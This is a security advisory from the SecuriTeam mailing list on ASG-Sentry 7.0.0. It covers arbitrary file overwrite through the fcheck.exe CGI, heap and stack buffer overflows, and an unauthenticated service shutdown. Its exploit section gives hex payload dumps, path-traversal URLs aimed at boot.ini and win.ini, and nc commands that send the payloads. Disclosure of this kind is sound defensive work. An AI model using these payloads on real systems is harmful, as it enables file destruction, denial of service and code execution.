[NEWS] ASG-Sentry Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  ASG-Sentry Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

"The  <http://www.asg-sentry.com> ASG-Sentry family of products is a suite 
of tools strategically engineered to control, monitor, manage, and enhance 
your network. Sentry's tools provide you with full visibility to your 
network from any Web browser. Sentry also allows you to fully instrument 
your company's applications, CPUs, disk space, memory, files, Windows and 
UNIX platforms, and more." Multiple vulnerabilities have been discovered 
in ASG-Sentry, these vulnerabilities allow remote attackers to cause the 
product to delete arbitrary files, cause the product to crash and overflow 
an internal buffer allowing the execution of arbitrary code.

DETAILS

Vulnerable Systems:
 * ASG-Sentry version 7.0.0

Arbitrary files deletion
The fcheck.exe (File Check Utility) CGI available in ASG is used for 
handling some index files which contain a list of filenames and checksums.

The -b option of this utility allows the creation of these index files and 
is possible to specify both the name of the output file and, optionally, 
the folder which will be scanned recursively for finding and reading the 
various files to add to the list.

The first vulnerability is in the possibility for an external attacker to 
use this CGI for overwriting existent files with no data (specifying a new 
folder which will be created by the same program) or with the list of 
filenames described before.

Naturally is possible to specify both files on the local disks or on 
network shares.

The second effect instead is the possibility of occupying CPU and disk for 
the scanning of any file in the disk simply specyfing, for example, c:\ as 
folder.

Heap-overflow in FxAgent
The FxAgent process running on UDP port 6161 is used for handling the 
various SNMP requests. A community field longer than 64 bytes can be used 
by an attacker to exploit a heap-overflow.

Termination of FxIAList
FxIAList is a service which runs on the TCP port 6162 and is used for the 
logging operations which include the commands "exit", "trace on" 
"verbose", "trace off" and the name of the log file to create (xxxx.xx.xx) 
and its content. The main problem is that the server doesn't require 
authentication so anyone can send the "exit" command and the service will 
just terminate.

Buffer overflow in FxIAList
The same service described before is affected also by a stack based 
buffer-overflow which happens during the copying of the data we want to 
write to the log file (max 1023 bytes) in a buffer of only 500.

Exploits:
asgulo_fxagent.txt:
0000000 2330 0102 0400 41ff 4141 4141 4141 4141
0000010 4141 4141 4141 4141 4141 4141 4141 4141
*
0000100 4141 4141 4141 16a1 0102 0236 0001 0102
0000110 3000 300b 0609 2b05 0106 0102 0005
000011e

asgulo-ialist1.txt:
0000000 7865 7469
0000004

asgulo-ialist2.txt:
0000000 3231 3433 3635 3837 4141 4141 4141 4141
0000010 4141 4141 4141 4141 4141 4141 4141 4141
*
00003f0 4141 4141 4141 4141 4141 4141 7c41 007c
00003ff

Arbitrary files deletion
  http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini
  http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\windows\win.ini
  http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\file.txt+c:\
  http://SERVER:6161/snmx-cgi/fcheck.exe?-b+\host\document.txt
this link for the network share is correct because Apache converts any 
backslash to double so that one becomes \\host\\document.txt

Heap-overflow in FxAgent
  nc SERVER 6161 -v -v -u < asgulo_fxagent.txt

Termination of FxIAList
  nc SERVER 6162 -v -v -w 1 < asgulo-ialist1.txt

Buffer overflow in FxIAList
  nc SERVER 6162 -v -v -w 1 < asgulo-ialist2.txt


ADDITIONAL INFORMATION

The information has been provided by  <mailto:aluigi@autistici.org> Luigi 
Auriemma.
The original article can be found at:  
<http://aluigi.altervista.org/adv/asgulo-adv.txt> 
http://aluigi.altervista.org/adv/asgulo-adv.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.